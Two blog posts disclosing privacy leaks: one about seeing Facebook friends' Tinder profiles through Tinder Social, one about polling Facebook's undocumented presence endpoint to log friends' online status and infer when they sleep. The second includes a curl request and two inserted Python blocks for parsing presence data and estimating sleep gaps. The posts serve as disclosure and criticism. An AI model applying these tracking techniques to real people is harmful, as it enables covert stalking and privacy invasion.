<p><em>Thanks for reading this!</em></p>
<p>And here’s the reply I got (within 48 hours, nice!):</p>
<p><em>>Hello,</em></p>
<p><em>>Thanks for bringing your concern to our attention. This is a part of our</em>
<em>feature called Tinder Social. You may opt out of Tinder Social at anytime by</em>
<em>visiting your Settings. If you opt out, you will not appear on your friends’</em>
<em>lists.</em></p>
<p><em>>To learn more about Tinder Social, please read our blog post here:</em>
<em>http://blog.gotinder.com/introducing-tinder-social/.</em></p>
<p>Props to the Tinder Security Team for responding so quickly. Also, sorry about
the barely coherent bug report, it was pretty late by the time I wrote this.</p>
<p>Anyway, since this thing is a feature, not a bug, I can blog about it in good
conscience. Right?</p>
<hr />
<p>Great, I thought so too. That’s why I also wrote a tool that finds the Tinder
information about your Facebook friends for you. <a href="https://github.com/defaultnamehere/tinder-detective">Here it
is.</a> Before you use it
you’ll have to type “y” to a prompt that asks you if you really want to stalk
your real-life Facebook friends. You also need to supply your Facebook
authentication Token, which you can get by intercepting your Tinder app’s
traffic with mitmproxy. Or there might be another way. Or you could just go
talk to them, I’m sure they’re nice.</p>
<h2 id="live-demo">Live demo</h2>
<p>Wow here we go I hope this works fingers crossed hahaha</p>
<p><img src="/img/2016-07-21-stalking-your-facebook-friends-on-tinder/a1d7422dfc2e333e878591a2c2243692dcfca27c737d1aacacbcfc4d24c580be.png" alt="image" /></p>
<p><em>Phew</em> it worked. That’s a screenshot of the 99% UX-free “webapp” I made to
display the Tinder profiles of your friends (with most of the information
faked in this picture). This page contains profiles for all your Facebook
friends that also have Tinder accounts. You can see information about them,
like their bio and the last time they used Tinder. You can also click the
buttons to long-range-sniper-noscope swipe left or right on them, even if they
haven’t shown up in the stream of people Tinder points at you.</p>
<p>Don’t actually use this by the way. Oh, no. That would be <em>creepy</em>. You
wouldn’t do that. Would you?</p>
<h2 id="so-is-this-even-a-big-deal">So is this even a big deal?</h2>
<p>Not for everyone, thankfully. But for some Tinder users, yeah it is. The main
idea is that there’s a subset of Tinder users that would rush to go and change
their profile if they found out their friends could see it.</p>
<p>Here’s what Tinder had to say about being able to find your friends on their
blog post announcing Tinder Social:</p>
<p><em>UPDATE: Any user who would prefer not to be added to groups can opt out of
Tinder Social through his/her settings to no longer appear on their friends’
lists. We are only testing it at this point, <strong>but it’s important to note
Tinder’s not a secret considering 70% of users download Tinder because their
friends recommend it.</strong></em></p>
<p>Yyyyyyeah I don’t really buy this reasoning, so I used it as the slogan of my
stalking program.</p>
<p>This is a bit like saying your Facebook Messenger chat history isn’t a secret
considering 70% of your friends recommend that you stop trying to SMS them
gifs.</p>
<p>For an app about relationships, which are generally the cause of drama and
tragedy in most storylines since the beginning of time, suddenly exposing
<em>more</em> personal information than before seems like it could lead to immediate
and lasting #regrets.</p>
<p>Basically here’s the deal. Some Tinder users put what I’m going to call
“sensitive information” in their Tinder profiles. If, suddenly, Tinder goes
from “only people Tinder suggests me to can see this” to “People I know in
real life can also see this and also swipe me”, I can imagine some people
feeling exposed.</p>
<p>Here are some extremely sensationalist examples of Bad Times that could
happen:</p>
<ul>
<li>You see that your monogamous cousin’s boyfriend is using Tinder right now</li>
<li>
<p>You see that <em>your</em> partner is using Tinder right now</p>
</li>
<li>
<p>Your friend’s using Tinder for dating but their Dad is a Mormon minister so they don’t want anyone to know</p>
</li>
<li>Your Facebook friend sees your Tinder bio and judges you, being all like “oh, I didn’t know <em>you</em> were into <em>that”</em></li>
<li>Some bozo makes graphs of when their Facebook friends are using Tinder and publishes them</li>
</ul>
<p>Those are all pretty worst-case, but they could happen. And I don’t want that!</p>
<p>I’m writing this blog post so you know that people can do this on Tinder, and
hey, maybe to encourage the folks at Tinder to reconsider deploying Tinder
Social to the rest of the world. (UPDATE: lol too late)</p>
<p>Okay, and I’m also still a little <em>salty</em> about the “idk just try it out in
uhhh idk, Australia” thing.</p>
<h2 id="tldr">tl;dr</h2>
<p><em>In summary:</em></p>
<ul>
<li><em>Tinder Social means your Facebook friends can see your Tinder user id</em></li>
<li><em>Using the Tinder API, your friends can use your user id to both swipe you and see your Tinder photos, bio, and the last time you were online.</em></li>
<li><em>Whoaaa</em></li>
</ul>
<h2 id="hey-wasnt-your-last-blog-post-also-about-stalking-your-friends">Hey wasn’t your last blog post also about stalking your friends?</h2>
<p>Heh yeah, two blogs in a row on stalking your friends, no biggie y’know haha.
They’re my ONLY two blogs actually ahahahahahahahahahahahahahahahahhahaha so
<em>funny</em> anyway I have to go I’m go̕i̗nǵ thrͩou͎g̼h a̰ͩ͂ tunn̅̾ėlͧ́
ȓ̸̜͊i͂g͡h͒t̶̛̟͂́͟ ̴͛̕͜n̬̾o̒̿͠w</p>
<hr />
<p><em>UPDATE: Plot twist, Tinder launched Tinder Social in the US the same day as
this blog post was published! According to their <a href="http://blog.gotinder.com/launching-tinder-social-a-new-way-to-plan-your-night/">blog
post</a> “You have to unlock Tinder Social in order to use it. Once you do,
you’ll see your friends who’ve also unlocked it (and they’ll see you).” I ran
Tinder Detective just now to see if what I did still works, and it does. This
could be because I’m in Australia and everyone in Australia has Tinder Social
“unlocked”. Or it could be that the APIs I’m using work regardless of whether
Tinder Social is “unlocked”. If you’re in America and you feel like testing
out whether the tool I wrote works there too, <a href="https://twitter.com/_notlikethis">tweet
me</a>.<br />
UPDATE 2: Thanks to some kind Americans on Twitter, we now know that you can
only stalk the Tinder profiles of your Facebook friends that have opted in to
Tinder Social. Unless you live in Australia. In which case you’re visible by
default. That’s what you get for being in staging, I guess.</em></p>
<hr />
<p><em>Jumbo-size extra crispy shoutouts to top humans
<a href="http://smerity.com/">Smerity</a> and <a href="https://blaker.space/">Blake</a> for their
sagely review of this blog post, and just generally for stopping me from
writing too many dumb things <3 <3</em></p>
<p><em>If you want to talk to me about this blog post then I dunno <a href="https://twitter.com/_mangopdf">hit me up on the tweet zone</a> I guess.</em></p>
<p><em>mangopdf: How I found a way to see the Tinder profiles of your Facebook friends. I told Tinder about this and they said "it's a feature lmao". Hacker News comments</em></p>
<hr />
<h1 id="graphing-when-your-facebook-friends-are-awake">Graphing when your Facebook friends are awake</h1>
<p><em>mangopdf, published 2016-02-15T05:02:38+00:00 at /graphing-when-your-facebook-friends-are-awake</em></p>
<p>Look I’m not really sure why but I think I made a thing that makes graphs of
when people are online on <a href="http://gabegaming.com">Facebook</a>. It sounds kinda
creepy and uh it is. Read along so you, too, can be the NSA. ˙ ͜ʟ˙</p>
<hr />
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-awake/c40272b2c7c3b9e438ef7c664d7885e84a11d339e5ba4592bcd8439c2a4f1b46.png" alt="image" /></p>
<hr />
<h2 id="little-green-dots">Little green dots</h2>
<p>You know those green dots on the sidebar on <a href="http://gabegaming.com">Facebook</a> that tell you who’s online? How do they get there?
Also there are times next to people who are offline. What are those about?</p>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-awake/551460a51d27e9ae89bf41324681e3003a79b8dae07b416222269958379bb02f.png" alt="image" /></p>
<p>I was wondering the same things, and so one day I decided to 360 noscope hack
<a href="http://niceme.me">Facebook</a> by right clicking and selecting “Inspect
Element”.</p>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-awake/9348aaaf747682858cf914ce9303b06d6c25ef31e0287e4b108c39d0be894838.png" alt="image" /></p>
<h2 id="im-in"><em>I’M <strong>IN</strong></em></h2>
<p>We did it team. Anyway alright uhhhh let’s just uh snoop around here
<em>reallllll sneaky like</em></p>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-awake/c8e33edf107c714f4a23857a0a0355a411e9063527c52851eda8409c824fa482.png" alt="image" /></p>
<p>If you reload the page you’ll see approximately fifty-bajillion network
requests go off as <a href="http://www.thinkb4uclick.ie/">Facebook</a> desperately tries
to load all the junk that it needs to display
<a href="https://www.youtube.com/watch?v=dQw4w9WgXcQ">facebook.com</a>.</p>
<p>You might be wondering at this point why I decided to look for interesting
things in this mess instead of, I dunno, getting out more, getting a cat, that
sorta thing. Anyway hey look a heading</p>
<h2 id="finding-the-good-stuff">Finding the good stuff</h2>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-awake/85cd30d6d53e78a721b13adbf3bb71cbf2aeb93ab33782deba57b288cdcfb69e.png" alt="image" /></p>
<p>What’s this “pull” thing?</p>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-awake/ffd837d89fc05b9cc94418bb6fc69293cfd09a0d6b59100cdb3d83f11fc23844.png" alt="image" /></p>
<p>THAT looks like some #datascience right there. This is the kind of <strong>100%
legit secret undocumented “API”</strong> that we came here for. Let’s do some
reverse-engineering.</p>
<p>It looks like a mapping of <a href="http://gabegaming.com">Facebook</a> user ids to…
their online status? But there’s more than one value? “webStatus” and
“fbAppStatus” are both there. What’s more, it tells you what the person is
<em>doing</em> on each of the different kinds of statuses.</p>
<p>For example:</p>
<ul>
<li>“messengerStatus”: “invisible” means they’re not online on the Facebook Messenger app.</li>
<li>“webStatus”: “idle” means their web browser is logged in to <a href="http://oneu.se">Facebook</a>, and has the page open, but they aren’t doing anything on the site like moving their mouse or talking to anyone.</li>
<li>Since we have both of these <em>at the same time</em>, we can tell that this person is likely not using their phone, and that they were using <a href="http://www.logobird.com/wp-content/uploads/2011/04/facebook-procrastination.jpg">facebook.com</a> recently, but not right now.</li>
</ul>
<p>That’s already a little creepy that we can tell that about people. But can we
do more with this?</p>
<p>You might also notice that there is a value called “la” that is a big integer
that starts with “14”. If you, I dunno, didn’t have a lot of friends in high
school, you might recognise that as a <a href="https://en.wikipedia.org/wiki/Unix_time">UNIX time
stamp</a> - the time in seconds since
midnight, January 1, 1970.</p>
<p>Computer Scientists thought this would be a good time to start measuring the
time from because the first app was born at midnight, January 1, 1970. The app
was a custom emoji pack for an ancient model of phone that would one day
evolve to become the first Blackberry.</p>
<p>If you’re wondering why the response starts with “for (;;);”, it’s to, among
other things, <a href="http://stackoverflow.com/a/7099820">encourage developers to use a quality JSON
decoder</a>, instead of like, y’know, eval().</p>
<p>Anyway that “la” thing stands for “last active”, and tells you the last time
the person was active on <a href="http://nsa.gov/careers">Facebook</a>, down to the
<em>second</em>. Do you see where I’m going with this?</p>
<h2 id="roleplaying-as-the-nsa-͜ʟ">Roleplaying as the NSA ˙ ͜ʟ˙</h2>
<p>So far we have a whole bunch of things which look like this</p>
<ul>
<li>A person</li>
<li>A time</li>
<li>Whether they’re <strong>online</strong> or <strong>offline</strong> or <strong>idle</strong></li>
<li>Which devices they’re online/offline/idle on</li>
</ul>
<p>This doesn’t seem that interesting at first, since you already know who is
online by looking at the sidebar. But <strong>what if there was someone <em>always</em>
watching the little green dots?</strong></p>
<p>Using the <em>power of computers</em>, you can just write a Python program to listen
to what the /pull requests are saying <em>all the time ever</em>, and write it down.</p>
<p>Here’s a screenshot of all the log files I’ve got:</p>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-awake/c1230c0b60926fd16c20aa323e114e4f144cb9597a633c946423c3080ff95b74.png" alt="image" /></p>
<p>And here’s what an individual log file looks like (the first 10 lines):</p>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-awake/85a7a3e40a761f8752bf2517b2c4b79d2c7ebef59254aa5dad80f45e9891fb66.png" alt="image" /></p>
<p>Those blurred out things are <a href="https://facebook.com/">Facebook</a> user ids. If
you think these screenshots look <em>a little bit creepy</em> then YEAH I KNOW RIGHT.</p>
<h2 id="tell-me-about-your-program-then-you-massive-nerd">Tell me about your program then you massive nerd</h2>
<p>It runs 24/7, and it’s constantly logging online/offline activity data from
those /pull URLs using my <a href="http://html9responsiveboilerstrapjs.com/">Facebook</a> cookie.</p>
<p>Writing it was <em>mostly</em> about saying “jeez, all these parameters look
<em>complicated</em>” and then blindly copy/pasting them anyway.</p>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-awake/c1c9830d821b384cb2ec97d9bebbd908f45d48ea3e5d8f7b6fc889f506f8e4c3.png" alt="image" /></p>
<p>Protip, you can right click on any network request in Chrome’s Developer Tools
and click “Copy as cURL”. This is <em>amazing</em> and lets you re-run a request from
the terminal, as well as give you all the headers and cookies used to run that
request in a nice copy-pasteable format.</p>
<p>The first step was to just run that request verbatim in a terminal with curl.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>> curl 'https://1-edge-chat.facebook.com/pull?channel=p_[redacted]&amp;seq=3&amp;partition=-2&amp;clientid=[redacted]&amp;cb=6dcn&amp;idle=5&amp;qp=y&amp;cap=8&amp;tur=1545&amp;qpmade=1455427171900&amp;pws=fresh&amp;isq=221841&amp;msgs_recv=3&amp;uid=[redacted]&amp;viewer_uid=[redacted]&amp;sticky_token=239&amp;sticky_pool=atn2c06_chat-proxy&amp;state=active' \
    -H 'origin: https://www.facebook.com' \
    -H 'dnt: 1' \
    -H 'accept-encoding: gzip, deflate, sdch' \
    -H 'accept-language: en-US,en;q=0.8,en-AU;q=0.6' \
    -H 'user-agent: [redacted]' \
    -H 'accept: */*' \
    -H 'referer: https://www.facebook.com/' \
    -H 'authority: 1-edge-chat.facebook.com' \
    -H 'cookie: [redacted]' \
    --compressed
</code></pre></div></div>
<p>I was expecting it to not work because it looks like it has some sequence
numbers in it oh boy BUT it turned out to just take a really long time. I
later found out this was because the /pull endpoint is using <a href="https://en.wikipedia.org/wiki/Push_technology">HTTP Long
Polling</a>, which turns out to be
like a streaming HTTP GET request.</p>
<p>The only other important parameter to worry about is “seq”, which I’m guessing
is the sequence number of the response from Facebook. Just add 1 to the
sequence number that the response from /pull gives for the next request and
you’re good to go.</p>
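<p>Here is a small parser for the response shape described above, as an added example (it is not code from this post or from the zzzzz tool): it strips the <code>for (;;);</code> prefix, decodes with a real JSON decoder instead of <code>eval()</code>, turns <code>la</code> into a timezone-aware time, and hands back <code>seq</code> so the caller can send <code>seq + 1</code>. The prefix, the <code>seq</code> key and the per-client status keys are taken from the post; the nesting under <code>"overlay"</code>, the user ids and the sample body are constructed for the example.</p>

```python
import json
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Dict, List, Tuple

# The prefix the post talks about: it makes the body unusable as a <script>
# source, so a client has to strip it and use a real JSON decoder.
ANTI_HIJACK_PREFIX = "for (;;);"

# Per-client status keys named in the post.
CLIENTS = ("webStatus", "messengerStatus", "fbAppStatus", "otherStatus")

# Constructed sample response (fake user ids, simplified nesting; assumption).
SAMPLE_RESPONSE = (
    'for (;;);{"t":"msg","seq":3,"overlay":{'
    '"100000000000001":{"la":1455427171,"status":"active","webStatus":"idle",'
    '"messengerStatus":"invisible","fbAppStatus":"offline","otherStatus":"offline"},'
    '"100000000000002":{"la":1455420000,"status":"active","webStatus":"offline",'
    '"messengerStatus":"active","fbAppStatus":"offline","otherStatus":"offline"}}}'
)


@dataclass(frozen=True)
class Presence:
    user_id: str
    last_active: datetime          # timezone-aware, built from "la"
    statuses: Dict[str, str]       # client key -> active/idle/invisible/offline

    def summary(self) -> str:
        """Coarse reading of the kind the post does by hand ("on the phone",
        "had the site open but is not doing anything")."""
        active = [c for c in CLIENTS if self.statuses.get(c) == "active"]
        if active:
            return "active:" + ",".join(active)
        idle = [c for c in CLIENTS if self.statuses.get(c) == "idle"]
        return "idle:" + ",".join(idle) if idle else "offline"


def strip_prefix(raw: str) -> str:
    """Drop the anti-hijacking prefix and refuse anything that is not a JSON
    object, so a surprising body is an error rather than something to eval()."""
    if raw.startswith(ANTI_HIJACK_PREFIX):
        raw = raw[len(ANTI_HIJACK_PREFIX):]
    body = raw.lstrip()
    if not body.startswith("{"):
        raise ValueError("pull body is not a JSON object")
    return body


def parse_pull(raw: str) -> Tuple[int, List[Presence]]:
    """Return (seq, presences). seq is handed back so the caller can send
    seq + 1 on the next long-poll request, as the post describes."""
    doc = json.loads(strip_prefix(raw))
    seq = int(doc["seq"])
    presences = []
    for uid, info in doc.get("overlay", {}).items():
        # "la" is UNIX seconds; attach a zone explicitly instead of relying on
        # the machine's local time, which is the trap the post's x-axis fell into.
        last_active = datetime.fromtimestamp(int(info["la"]), tz=timezone.utc)
        statuses = {c: info.get(c, "offline") for c in CLIENTS}
        statuses["status"] = info.get("status", "offline")
        presences.append(Presence(str(uid), last_active, statuses))
    return seq, presences


def next_seq(seq: int) -> int:
    """Sequence number to send on the following /pull request."""
    return seq + 1


def log_line(p: Presence) -> str:
    """One log line in the shape the post's screenshots show: time, id, state."""
    return f"{p.last_active.isoformat()} {p.user_id} {p.summary()}"


if __name__ == "__main__":
    seq, people = parse_pull(SAMPLE_RESPONSE)
    for person in people:
        print(log_line(person))
    print("next /pull should carry seq =", next_seq(seq))
```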
<p>If you’re worrying about remembering all this, chill out I got yo’ back, my
100% <a href="https://www.facebook.com/terms">Terms of Service Compliant</a>
implementation of this is available <a href="https://github.com/defaultnamehere/zzzzz">here on
GitHub</a>. Standard disclaimers of
“I’m so sorry I wrote parts of this in like 30 minutes” apply.</p>
<p>One caveat of the data-collection program that I’ve noticed is that it has
false negatives. That is, sometimes it won’t give you a “this person is
online” data point, even though they really are online. I guess that gives
plausible deniability of… being offline?</p>
<h2 id="you-should-probably-get-out-more">You should probably get out more</h2>
<p>[worried laughter]</p>
<h2 id="so-thats-the-hard-part-done-right">So that’s the hard part done, right?</h2>
<p><strong>Let me paint you a word-picture</strong>. It’s 11pm, I’m listening to <a href="https://www.youtube.com/watch?v=1Ua2gabdJoc">the soundtrack to The Social Network</a> (ironically? meta-ironically? I don’t even know), I have six terminals tiled across two screens as well as fifty thousand browser tabs open and I’m up to my <em><strong>third</strong> graphing library</em>.</p>
<p>Making graphs is really hard.</p>
<p>I used <a href="http://matplotlib.org/">matplotlib</a>, but I realised this wasn’t my
thesis and I wouldn’t be embedding this ugly graph as a pdf into a LaTeX
document that takes 3 passes of pdflatex to render because there’s been a
terrible but extremely localised accident where only humanity’s LaTeX to pdf
converters have been irreversibly sent back in time to the 80s.</p>
<p>I used <a href="http://bokeh.pydata.org/">bokeh</a>, which claims to be a “matplotlib-killer”,
and it was okay until <a href="http://blakeapproves.com">a friend</a> told me “it
isn’t the 90s anymore, you don’t generate graphs server-side. Also your graphs
are ugly and you should feel ugly <strong>you utter fraud</strong>”.</p>
<p><a href="http://blaker.space">This friend</a> recommended <a href="http://nvd3.org/">nvd3.js</a>,
presumably because you’re not making <em>real</em> graphs in 2016 unless your
graphing library is &lt;something&gt;.js and requires at LEAST one other
&lt;something else&gt;.js as a dependency. Everyone looks at you like “<strong>what,
you DON’T already use &lt;something else&gt;.js?</strong> Jeez say goodbye to your
Hacker News karma. Just apt-get install npm &amp;&amp; npm install bower
&amp;&amp; bower install-” NO STOP IT THIS ISN’T WHAT <a href="https://en.wikipedia.org/wiki/Tim_Berners-Lee">TIM BERNERS-LEE</a> WANTED.</p>
<p>I think it took about three times as much time to graph the data as it took to
write the code to download it. And <strong>the graphs aren’t even good</strong>! I gave up
on perfecting the graphs so I could just hurry up and write this questionable
blog post already. Just think of me resolving pip3 dependencies when you see
the ugly graphs.</p>
<p>(°ロ°)☝ <strong>AND ANOTHER THING</strong> when it’s midnight and your x-axis formatting
function doesn’t convert UNIX times into JavaScript date objects properly
because there’s no timezone information and I dunno JavaScript was written by
some guy in two weeks (yeah I ain’t afraid to call it out what of it) and your
binary-search based conversion of sparse timeseries data into uniformly dense
timeseries data is causing <em>so many data points</em> to be graphed that it’s
slowly crashing Chrome and you’re watching <em>helplessly</em> as your RAM goes up
and Chrome won’t close the tab and it just <em>doesn’t seem right</em> that 2016, the
year of the Linux Desktop has brought us this situation I mean I thought if
you had enough &lt;something&gt;.js libraries this stuff was meant to just <em>scale right up</em> so tha-</p>
<h2 id="quit-stalling-with-graphing-libraries-and-show-me-the-graphs">Quit stalling with graphing libraries and show me the graphs</h2>
<p>Fine but you’re missing out on top-quality graphing-related banter.</p>
<hr />
<p><em>The graphs in this section are all of the online/offline activity of some of
my Facebook friends. They consented to it being on this blog post on the
condition that it’s anonymous.</em></p>
<hr />
<h2 id="person-1">Person 1</h2>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-awake/48fe7be2ca53245ed9d96e7ccfe7449ed6a3d36a0efda7c2f37e1701b14db7ac.png" alt="image" /></p>
<p>Here’s someone’s graph. The x-axis is time, and the y-axis is how online the
user is. Possible states for someone’s status are “offline”, “invisible”,
“idle”, and “active”. Each coloured line is a different kind of <em>client</em>. It’s
called a <em>client</em> because I don’t know I’m an Information Visualisation
<em>Professional</em> and I get to make up words like that. Here are explanations for
what each of the <em>“coloured lines”</em> means:</p>
<ul>
<li><strong>status</strong> - Not sure what this is. Some kind of client-agnostic status? It doesn’t line up exactly with the activity of the other clients though</li>
<li><strong>webStatus</strong> - Chat activity on facebook.com</li>
<li><strong>messengerStatus</strong> - Status on the Messenger mobile app</li>
<li><strong>fbAppStatus</strong> - Status on the Facebook mobile app</li>
<li><strong>otherStatus</strong> - Presumably shows when people are online on other apps that can access the API that causes them to be considered “online”. OAuth? Random “apps” like Farmville? No idea</li>
</ul>
<p>Here’s the same graph, with some clumsy drawings on it showing when I think
this person is awake/asleep.</p>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-awake/07d0873f21529f89f9c56f429820d4185d33af87f3f503dd6a46e4f70e235856.png" alt="image" /></p>
<p>You can see the amount of rest they’re getting each day - it’s the width of
the “asleep” bit.</p>
<p>You can also see that they were probably asleep from 3am to 10am on February
11, and BOY does it feel creepy writing this.</p>
<p>Of course, this isn’t perfect, since they might be awake and <em>not</em> using
Facebook (I know). Having spoken to a few people who were graphed, it’s been a
fairly accurate measure of awake/asleep time, as well as “how much do you
browse Facebook at work” time ;)</p>
<p>Do you look at Facebook shortly after you wake up? Shortly before you sleep?
If so, these graphs are a fairly accurate way to measure when you were asleep,
and anyone you’re friends with on Facebook can do it.</p>
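<p>To make the two data steps behind a graph like this concrete, here is an added example (not the post’s code, nor anything from the zzzzz repository): it resamples a sparse status log onto a fixed grid with a binary search, the same conversion the post describes but with the grid step bounding the number of points, and then reads off the widest inactive stretch, which is the “asleep” width shown by eye above. The sample log is constructed; only the status names and the awake/asleep reading are from the post.</p>

```python
from bisect import bisect_right
from datetime import datetime, timezone
from typing import List, Optional, Tuple

# Statuses that count as "using Facebook" for the awake/asleep reading.
ACTIVE = {"active", "idle"}

# Constructed sample: (unix seconds, webStatus) changes for one fake user on
# 2016-02-11 UTC. Sparse: there is a point only when the status changed.
DAY = 1455148800  # 2016-02-11T00:00:00Z
SAMPLES = [
    (DAY + 0 * 3600, "active"),
    (DAY + 1 * 3600, "idle"),
    (DAY + 2 * 3600 + 1500, "offline"),   # 02:25, last seen before bed
    (DAY + 10 * 3600, "active"),          # 10:00, first activity of the day
    (DAY + 12 * 3600, "offline"),
    (DAY + 12 * 3600 + 600, "active"),
    (DAY + 18 * 3600, "offline"),
    (DAY + 23 * 3600, "active"),
]

Sample = Tuple[int, str]


def status_at(samples: List[Sample], t: int) -> str:
    """Status in force at t: the latest sample at or before t (binary search,
    as in the post's conversion), 'offline' before the first sample."""
    times = [s[0] for s in samples]
    i = bisect_right(times, t)
    return samples[i - 1][1] if i else "offline"


def densify(samples: List[Sample], start: int, end: int, step: int) -> List[Sample]:
    """Resample onto a uniform grid. The point count is (end - start) // step + 1,
    so step is the knob that keeps a long capture from turning into the pile of
    points the post describes choking the browser."""
    if step <= 0:
        raise ValueError("step must be positive")
    times = [s[0] for s in samples]
    grid = []
    for t in range(start, end + 1, step):
        i = bisect_right(times, t)
        grid.append((t, samples[i - 1][1] if i else "offline"))
    return grid


def longest_inactive_gap(grid: List[Sample]) -> Optional[Tuple[int, int]]:
    """(start, end) of the longest run of non-active grid points; end is the
    first active point after the run. None if the user was never inactive."""
    best: Optional[Tuple[int, int]] = None
    run_start: Optional[int] = None
    for t, status in grid:
        if status in ACTIVE:
            if run_start is not None and (best is None or t - run_start > best[1] - best[0]):
                best = (run_start, t)
            run_start = None
        elif run_start is None:
            run_start = t
    if run_start is not None:       # still inactive at the end of the window
        t = grid[-1][0]
        if best is None or t - run_start > best[1] - best[0]:
            best = (run_start, t)
    return best


def estimate_sleep(samples: List[Sample], start: int, end: int,
                   step: int = 300) -> Optional[Tuple[str, str, float]]:
    """("HH:MM" asleep, "HH:MM" awake, hours) read off the widest gap, the same
    reading the post makes by eye. The post's caveat applies: a missing "online"
    sample (a false negative) is indistinguishable from real inactivity here."""
    gap = longest_inactive_gap(densify(samples, start, end, step))
    if gap is None:
        return None
    clock = lambda t: datetime.fromtimestamp(t, tz=timezone.utc).strftime("%H:%M")
    return clock(gap[0]), clock(gap[1]), (gap[1] - gap[0]) / 3600


if __name__ == "__main__":
    print(estimate_sleep(SAMPLES, DAY, DAY + 86400))
```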
<h2 id="person-2">Person 2</h2>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-awake/6cad6465fc3202a5a1875c692a071b54d1d8672ea2ddad4c45ff4c9303779177.png" alt="image" /></p>
<p>I showed this person their graph and asked them some questions.</p>
<blockquote>
<p>“Did you go to sleep around 11:10pm last night?”<br />
They said yes.</p>
</blockquote>
<blockquote>
<p>“Did you wake up around 8:32? That’s a weird time. Was your alarm set for
8:30?”<br />
They said yes.</p>
</blockquote>
<p>NSA APPROVED ✔️ 🆗👌👌 👍✔️👌🆗🆗👍</p>
<h2 id="person-3">Person 3</h2>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-awake/db07774710fbb3a457d4aa90aef1e846459649a71a44672cbee4bf9648d7c104.png" alt="image" /></p>
<p>There are two interesting things about this graph</p>
<ul>
<li>
<p>The person isn’t online as frequently as the previous examples</p>
</li>
<li>
<p>The person isn’t using the Messenger app nearly as much</p>
</li>
</ul>
<p>You can see that their webStatus was “online” on and off from midnight til
around 2am, and then again at 10:21am. I’m not sure if this spiky pattern
means that they really were online, then offline, then online again, or if
it’s just a quirk of the dodgy undocumented “API” I’m using, or even if it’s
just a problem with my code.</p>
<p>Similarly, I’m not sure why there are these weird spikes every three minutes
(± about 1 minute) sometimes.</p>
<p><img src="/img/2016-02-15-graphing-when-your-facebook-friends-are-awake/88e8b53a88b5706494f6d5d66859087f64b8c68559c1e5e6548a863d2797f726.png" alt="image" /></p>
<p>Also, why does “otherStatus” go to offline precisely when “webStatus” goes to
online? So many questions! Let me know if you know the answers to any of these
things (@Facebook employee friends ;) ;) ;))</p>
<hr />
<p>Anyway, I hope I’ve convinced you that this is real creepy. I don’t really
want to be able to have the power to do this.</p>
<h2 id="your-dumb-graph-screenshots-are-too-small-give-me-a-live-graph-to-play-with">Your dumb graph screenshots are too small. Give me a live graph to play with</h2>
<p><a href="https://cdn.rawgit.com/defaultnamehere/zzzzz/70d407736092304ee247fbbacbe9f82bc0cba472/templates/sample_graph.html">You got it, boss. Click here. Or anywhere, really. This whole sentence is a
link.</a></p>
<h2 id="what-else-can-you-do-with-this-data">What else can you do with this data?</h2>
<p>You can aggregate. Finding the average wake up time/sleep time/time spent on
Facebook each day and then looking for outliers sure sounds like a way to find
interesting things about your Facebook friends.</p>
<p>You can write a thing to email you every morning with the names and sleep
times of everyone who’s had less than 6 hours of sleep.</p>
<p>You could even try and guess when your friends are talking to each other, by
looking for times when only a few people are active, although I suspect this
would be hard.</p>
<p>I’m sure you can come up with something else, too.</p>
<h2 id="why-can-you-do-this-cant-facebook-stop-this-from-happening">Why can you do this? Can’t Facebook stop this from happening?</h2>
<p>That’s a good question, thanks for asking.</p>
<p>It makes sense for <a href="nicememe.website">Facebook</a> to be able to do this, since
they can tell when everyone is online anyway. But why can your <a href="https://matmartinez.net/nsfw/">Facebook</a> friends do this to you?</p>
<p>I don’t know all the details of how facebook.com uses all the data that’s sent
via the /pull endpoint, but it’s kinda creepy that I can see my friends’
status on every device? I guess they could just give me “web” or “mobile” or
“offline”, rather than the full list of statuses for every client, but even
that doesn’t solve the problem.</p>
<p>I also see the value in seeing “last active 4h ago” and “last active 1m ago”
for Messenger contacts but… I dunno, here I am making these creepy graphs.</p>
<p>Anyway, I just open-sourced my dodgy graph making thing so now everyone can do
this. And who knows how many people have been doing it already?</p>
<p>I’m probably oversimplifying it, though. The smart people at <a href="https://myspace.com/">Facebook</a> who write this stuff have probably thought of all of
this and found that this way was best.</p>
<h2 id="can-i-stop-you-from-doing-this-to-me">Can I stop you from doing this to me?</h2>
<p>Kinda. Coincidentally, because my script is always running, collecting data, I
show up as “online” all the time. If you were also running a script like this,
it would partially prevent what I’m doing from working on you, since you
always show up as “online”, no matter what you’re <em>really</em> doing. Activity
from the Messenger app will still show up separately, though.</p>
<h2 id="tldr">tl;dr</h2>
<ul>
<li>
<p><a href="https://pbs.twimg.com/media/CRRJVwIUwAAf-wP.png">Facebook</a> sends your computer a bunch of interesting information when you’re on <a href="https://pbs.twimg.com/media/CRRGTVcU8AA7veC.png:large">facebook.com</a>.</p>
</li>
<li>
<p>You can collect that information over time and use it to keep track of when people are on <a href="http://dudududu.de/">Facebook</a>, and which devices they’re using.</p>
</li>
<li>You can make a pretty good guess as to what time people are going to sleep and waking up</li>
<li>It’s creepy, but I don’t see a way for <a href="https://en.wikipedia.org/wiki/Phishing#Link_manipulation">Facebook</a> to stop allowing this while still making their chat app good.</li>
</ul>
<h2 id="so-how-does-this-make-money-again">So how does this make money again?</h2>
<p>Oh, no no no. I just uh don’t get out much.</p>
<hr />
<p><em>If you want to talk to me about this blog post then I dunno <a href="https://twitter.com/mangopdf">tweet at
me</a> I guess. You can also <a href="https://github.com/defaultnamehere/">stalk me on
GitHub</a> if you want.</em></p>
<p><em>mangopdf: I stumbled upon a dodgy Facebook API. Read for tips on how to apply at the NSA. Hacker News comments</em></p>